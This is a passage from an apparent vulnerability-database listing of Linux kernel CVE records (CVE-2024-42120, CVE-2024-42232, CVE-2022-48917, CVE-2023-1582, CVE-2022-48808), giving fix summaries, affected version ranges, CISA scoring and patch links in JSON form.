| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.091Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b2e9abc95583ac7bbb2c47da4d476a798146dfd6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b3702f9d43d163fd05e43b7d7e22e766dbef329"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d2c3645a4a5ae5d933b4116c305d9d82b8199dbf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/96bf81cc1bd058bb8af6e755a548e926e934dfd1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c5ec2afeeee4c91cebc4eff6d4f1ecf4047259f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5396a70e8cf462ec5ccf2dc8de103c79de9489e6"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42120",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:00.348266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:05.414Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b2e9abc95583ac7bbb2c47da4d476a798146dfd6",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "0b3702f9d43d163fd05e43b7d7e22e766dbef329",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "d2c3645a4a5ae5d933b4116c305d9d82b8199dbf",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "96bf81cc1bd058bb8af6e755a548e926e934dfd1",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "c5ec2afeeee4c91cebc4eff6d4f1ecf4047259f4",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "5396a70e8cf462ec5ccf2dc8de103c79de9489e6",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check pipe offset before setting vblank\n\npipe_ctx has a size of MAX_PIPES so checking its index before accessing\nthe array.\n\nThis fixes an OVERRUN issue reported by Coverity."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:19:57.802Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b2e9abc95583ac7bbb2c47da4d476a798146dfd6"
},
{
"url": "https://git.kernel.org/stable/c/0b3702f9d43d163fd05e43b7d7e22e766dbef329"
},
{
"url": "https://git.kernel.org/stable/c/d2c3645a4a5ae5d933b4116c305d9d82b8199dbf"
},
{
"url": "https://git.kernel.org/stable/c/96bf81cc1bd058bb8af6e755a548e926e934dfd1"
},
{
"url": "https://git.kernel.org/stable/c/c5ec2afeeee4c91cebc4eff6d4f1ecf4047259f4"
},
{
"url": "https://git.kernel.org/stable/c/5396a70e8cf462ec5ccf2dc8de103c79de9489e6"
}
],
"title": "drm/amd/display: Check pipe offset before setting vblank",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42120",
"datePublished": "2024-07-30T07:46:12.136Z",
"dateReserved": "2024-07-29T15:50:41.178Z",
"dateUpdated": "2025-07-11T17:19:57.802Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42232 (GCVE-0-2024-42232)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
libceph: fix race between delayed_work() and ceph_monc_stop()
The way the delayed work is handled in ceph_monc_stop() is prone to
races with mon_fault() and possibly also finish_hunting(). Both of
these can requeue the delayed work which wouldn't be canceled by any of
the following code in case that happens after cancel_delayed_work_sync()
runs -- __close_session() doesn't mess with the delayed work in order
to avoid interfering with the hunting interval logic. This part was
missed in commit b5d91704f53e ("libceph: behave in mon_fault() if
cur_mon < 0") and use-after-free can still ensue on monc and objects
that hang off of it, with monc->auth and monc->monmap being
particularly susceptible to quickly being reused.
To fix this:
- clear monc->cur_mon and monc->hunting as part of closing the session
in ceph_monc_stop()
- bail from delayed_work() if monc->cur_mon is cleared, similar to how
it's done in mon_fault() and finish_hunting() (based on monc->hunting)
- call cancel_delayed_work_sync() after the session is closed
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42232",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:16.994766Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:32.623Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ceph/mon_client.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1177afeca833174ba83504688eec898c6214f4bf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "63e5d035e3a7ab7412a008f202633c5e6a0a28ea",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "34b76d1922e41da1fa73d43b764cddd82ac9733c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "20cf67dcb7db842f941eff1af6ee5e9dc41796d7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2d33654d40a05afd91ab24c9a73ab512a0670a9a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9525af1f58f67df387768770fcf6d6a8f23aee3d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "33d38c5da17f8db2d80e811b7829d2822c10625e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "69c7b2fe4c9cc1d3b1186d1c5606627ecf0de883",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ceph/mon_client.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix race between delayed_work() and ceph_monc_stop()\n\nThe way the delayed work is handled in ceph_monc_stop() is prone to\nraces with mon_fault() and possibly also finish_hunting(). Both of\nthese can requeue the delayed work which wouldn\u0027t be canceled by any of\nthe following code in case that happens after cancel_delayed_work_sync()\nruns -- __close_session() doesn\u0027t mess with the delayed work in order\nto avoid interfering with the hunting interval logic. This part was\nmissed in commit b5d91704f53e (\"libceph: behave in mon_fault() if\ncur_mon \u003c 0\") and use-after-free can still ensue on monc and objects\nthat hang off of it, with monc-\u003eauth and monc-\u003emonmap being\nparticularly susceptible to quickly being reused.\n\nTo fix this:\n\n- clear monc-\u003ecur_mon and monc-\u003ehunting as part of closing the session\n in ceph_monc_stop()\n- bail from delayed_work() if monc-\u003ecur_mon is cleared, similar to how\n it\u0027s done in mon_fault() and finish_hunting() (based on monc-\u003ehunting)\n- call cancel_delayed_work_sync() after the session is closed"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:41.173Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1177afeca833174ba83504688eec898c6214f4bf"
},
{
"url": "https://git.kernel.org/stable/c/63e5d035e3a7ab7412a008f202633c5e6a0a28ea"
},
{
"url": "https://git.kernel.org/stable/c/34b76d1922e41da1fa73d43b764cddd82ac9733c"
},
{
"url": "https://git.kernel.org/stable/c/20cf67dcb7db842f941eff1af6ee5e9dc41796d7"
},
{
"url": "https://git.kernel.org/stable/c/2d33654d40a05afd91ab24c9a73ab512a0670a9a"
},
{
"url": "https://git.kernel.org/stable/c/9525af1f58f67df387768770fcf6d6a8f23aee3d"
},
{
"url": "https://git.kernel.org/stable/c/33d38c5da17f8db2d80e811b7829d2822c10625e"
},
{
"url": "https://git.kernel.org/stable/c/69c7b2fe4c9cc1d3b1186d1c5606627ecf0de883"
}
],
"title": "libceph: fix race between delayed_work() and ceph_monc_stop()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42232",
"datePublished": "2024-08-07T15:14:23.074Z",
"dateReserved": "2024-07-30T07:40:12.251Z",
"dateUpdated": "2025-05-04T09:24:41.173Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48917 (GCVE-0-2022-48917)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2025-05-10T14:08:16.032Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48917",
"datePublished": "2024-08-22T01:32:20.608Z",
"dateRejected": "2025-05-10T14:08:16.032Z",
"dateReserved": "2024-08-21T06:06:23.295Z",
"dateUpdated": "2025-05-10T14:08:16.032Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-1582 (GCVE-0-2023-1582)
Vulnerability from cvelistv5
Published
2023-04-05 00:00
Modified
2025-02-13 15:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A race problem was found in fs/proc/task_mmu.c in the memory management sub-component in the Linux kernel. This issue may allow a local attacker with user privilege to cause a denial of service.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T05:57:24.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/linux-mm/Yg6ac8WlwtnDH6M0%40kroah.com/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-1582",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-13T15:00:24.389575Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-13T15:00:33.996Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Linux",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux Kernel prior to Kernel 5.7 RC14"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A race problem was found in fs/proc/task_mmu.c in the memory management sub-component in the Linux kernel. This issue may allow a local attacker with user privilege to cause a denial of service."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-04-05T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://lore.kernel.org/linux-mm/Yg6ac8WlwtnDH6M0%40kroah.com/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-1582",
"datePublished": "2023-04-05T00:00:00.000Z",
"dateReserved": "2023-03-22T00:00:00.000Z",
"dateUpdated": "2025-02-13T15:00:33.996Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48808 (GCVE-0-2022-48808)
Vulnerability from cvelistv5
Published
2024-07-16 11:43
Modified
2025-05-04 08:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: fix panic when DSA master device unbinds on shutdown
Rafael reports that on a system with LX2160A and Marvell DSA switches,
if a reboot occurs while the DSA master (dpaa2-eth) is up, the following
panic can be seen:
systemd-shutdown[1]: Rebooting.
Unable to handle kernel paging request at virtual address 00a0000800000041
[00a0000800000041] address between user and kernel address ranges
Internal error: Oops: 96000004 [#1] PREEMPT SMP
CPU: 6 PID: 1 Comm: systemd-shutdow Not tainted 5.16.5-00042-g8f5585009b24 #32
pc : dsa_slave_netdevice_event+0x130/0x3e4
lr : raw_notifier_call_chain+0x50/0x6c
Call trace:
dsa_slave_netdevice_event+0x130/0x3e4
raw_notifier_call_chain+0x50/0x6c
call_netdevice_notifiers_info+0x54/0xa0
__dev_close_many+0x50/0x130
dev_close_many+0x84/0x120
unregister_netdevice_many+0x130/0x710
unregister_netdevice_queue+0x8c/0xd0
unregister_netdev+0x20/0x30
dpaa2_eth_remove+0x68/0x190
fsl_mc_driver_remove+0x20/0x5c
__device_release_driver+0x21c/0x220
device_release_driver_internal+0xac/0xb0
device_links_unbind_consumers+0xd4/0x100
__device_release_driver+0x94/0x220
device_release_driver+0x28/0x40
bus_remove_device+0x118/0x124
device_del+0x174/0x420
fsl_mc_device_remove+0x24/0x40
__fsl_mc_device_remove+0xc/0x20
device_for_each_child+0x58/0xa0
dprc_remove+0x90/0xb0
fsl_mc_driver_remove+0x20/0x5c
__device_release_driver+0x21c/0x220
device_release_driver+0x28/0x40
bus_remove_device+0x118/0x124
device_del+0x174/0x420
fsl_mc_bus_remove+0x80/0x100
fsl_mc_bus_shutdown+0xc/0x1c
platform_shutdown+0x20/0x30
device_shutdown+0x154/0x330
__do_sys_reboot+0x1cc/0x250
__arm64_sys_reboot+0x20/0x30
invoke_syscall.constprop.0+0x4c/0xe0
do_el0_svc+0x4c/0x150
el0_svc+0x24/0xb0
el0t_64_sync_handler+0xa8/0xb0
el0t_64_sync+0x178/0x17c
It can be seen from the stack trace that the problem is that the
deregistration of the master causes a dev_close(), which gets notified
as NETDEV_GOING_DOWN to dsa_slave_netdevice_event().
But dsa_switch_shutdown() has already run, and this has unregistered the
DSA slave interfaces, and yet, the NETDEV_GOING_DOWN handler attempts to
call dev_close_many() on those slave interfaces, leading to the problem.
The previous attempt to avoid the NETDEV_GOING_DOWN on the master after
dsa_switch_shutdown() was called seems improper. Unregistering the slave
interfaces is unnecessary and unhelpful. Instead, after the slaves have
stopped being uppers of the DSA master, we can now reset to NULL the
master->dsa_ptr pointer, which will make DSA start ignoring all future
notifier events on the master.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.570Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff45899e732e57088985e3a497b1d9100571c0f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89b60402d43cdab4387dbbf24afebda5cf092ae7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee534378f00561207656663d93907583958339ae"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48808",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:58:41.309818Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:13.530Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/dsa/dsa2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ff45899e732e57088985e3a497b1d9100571c0f5",
"status": "affected",
"version": "0650bf52b31ff35dc6430fc2e37969c36baba724",
"versionType": "git"
},
{
"lessThan": "89b60402d43cdab4387dbbf24afebda5cf092ae7",
"status": "affected",
"version": "0650bf52b31ff35dc6430fc2e37969c36baba724",
"versionType": "git"
},
{
"lessThan": "ee534378f00561207656663d93907583958339ae",
"status": "affected",
"version": "0650bf52b31ff35dc6430fc2e37969c36baba724",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/dsa/dsa2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.10",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: fix panic when DSA master device unbinds on shutdown\n\nRafael reports that on a system with LX2160A and Marvell DSA switches,\nif a reboot occurs while the DSA master (dpaa2-eth) is up, the following\npanic can be seen:\n\nsystemd-shutdown[1]: Rebooting.\nUnable to handle kernel paging request at virtual address 00a0000800000041\n[00a0000800000041] address between user and kernel address ranges\nInternal error: Oops: 96000004 [#1] PREEMPT SMP\nCPU: 6 PID: 1 Comm: systemd-shutdow Not tainted 5.16.5-00042-g8f5585009b24 #32\npc : dsa_slave_netdevice_event+0x130/0x3e4\nlr : raw_notifier_call_chain+0x50/0x6c\nCall trace:\n dsa_slave_netdevice_event+0x130/0x3e4\n raw_notifier_call_chain+0x50/0x6c\n call_netdevice_notifiers_info+0x54/0xa0\n __dev_close_many+0x50/0x130\n dev_close_many+0x84/0x120\n unregister_netdevice_many+0x130/0x710\n unregister_netdevice_queue+0x8c/0xd0\n unregister_netdev+0x20/0x30\n dpaa2_eth_remove+0x68/0x190\n fsl_mc_driver_remove+0x20/0x5c\n __device_release_driver+0x21c/0x220\n device_release_driver_internal+0xac/0xb0\n device_links_unbind_consumers+0xd4/0x100\n __device_release_driver+0x94/0x220\n device_release_driver+0x28/0x40\n bus_remove_device+0x118/0x124\n device_del+0x174/0x420\n fsl_mc_device_remove+0x24/0x40\n __fsl_mc_device_remove+0xc/0x20\n device_for_each_child+0x58/0xa0\n dprc_remove+0x90/0xb0\n fsl_mc_driver_remove+0x20/0x5c\n __device_release_driver+0x21c/0x220\n device_release_driver+0x28/0x40\n bus_remove_device+0x118/0x124\n device_del+0x174/0x420\n fsl_mc_bus_remove+0x80/0x100\n fsl_mc_bus_shutdown+0xc/0x1c\n platform_shutdown+0x20/0x30\n device_shutdown+0x154/0x330\n __do_sys_reboot+0x1cc/0x250\n __arm64_sys_reboot+0x20/0x30\n invoke_syscall.constprop.0+0x4c/0xe0\n do_el0_svc+0x4c/0x150\n el0_svc+0x24/0xb0\n el0t_64_sync_handler+0xa8/0xb0\n el0t_64_sync+0x178/0x17c\n\nIt can be seen from the stack trace that the problem is that the\nderegistration of the master causes a dev_close(), which gets notified\nas NETDEV_GOING_DOWN to dsa_slave_netdevice_event().\nBut dsa_switch_shutdown() has already run, and this has unregistered the\nDSA slave interfaces, and yet, the NETDEV_GOING_DOWN handler attempts to\ncall dev_close_many() on those slave interfaces, leading to the problem.\n\nThe previous attempt to avoid the NETDEV_GOING_DOWN on the master after\ndsa_switch_shutdown() was called seems improper. Unregistering the slave\ninterfaces is unnecessary and unhelpful. Instead, after the slaves have\nstopped being uppers of the DSA master, we can now reset to NULL the\nmaster-\u003edsa_ptr pointer, which will make DSA start ignoring all future\nnotifier events on the master."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:23:31.768Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ff45899e732e57088985e3a497b1d9100571c0f5"
},
{
"url": "https://git.kernel.org/stable/c/89b60402d43cdab4387dbbf24afebda5cf092ae7"
},
{
"url": "https://git.kernel.org/stable/c/ee534378f00561207656663d93907583958339ae"
}
],
"title": "net: dsa: fix panic when DSA master device unbinds on shutdown",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48808",
"datePublished": "2024-07-16T11:43:59.089Z",
